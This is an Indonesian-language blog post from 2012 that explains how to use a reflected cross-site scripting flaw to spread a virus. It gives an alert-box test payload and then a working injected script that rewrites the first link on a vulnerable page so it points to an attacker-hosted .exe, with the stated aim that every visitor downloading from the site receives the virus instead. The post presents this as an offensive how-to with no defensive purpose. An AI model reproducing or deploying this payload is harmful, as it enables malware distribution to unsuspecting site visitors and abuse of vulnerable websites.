Friday, April 13, 2012

XSS Untuk Penyebaran Virus

Saatnya beraksi agar kalian bisa mengetahui, pake tools apa sih para virus creator untuk menyebarkan virusnya?
Semua pasti bertanya-tanya, para virus creator menggunakan apa sih untuk menyebarkan virus? Berikut ini adalah beberapa cara bagaimana virus creator menyebarkan virusnya:
1. Email
2. Phising
3. USB
4. Hacking
5. Cracking

Kita memilih dengan cara Hacking & Cracking yaitu dengan menggunakan XSS!
Skenarionya adalah:
1. Kita memiliki situs virus / menempatkan sebuah virus di situs, misal: http://www.situssaya.com/virussaya.exe
2. Kita memiliki target yang memiliki vulnerability untuk CSS, misalkan: http://www.target.com/index.php?download=<script>alert(“BinusHacker Was Here”)</script> apabila muncul alert box, berarti website tersebut memiliki vulnerability.
Bagi yang menggunakan Mozilla Firefox, silakan download tools berikut untuk melakukan check XSS:
Download XSS Tools
Nah, langsung saja pada praktek!
Ubah saja yang ada di web target menjadi seperti berikut untuk menyebarkan virus:
http://www.target.com/index.php?download=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.situssaya.com/virussaya.exe”; }</script>
Kesimpulan:
Setiap ada user yang melakukan download di website tersebut, yang akan terdownload adalah virus yang kita miliki.

Reactions:

0 comments:

Post a Comment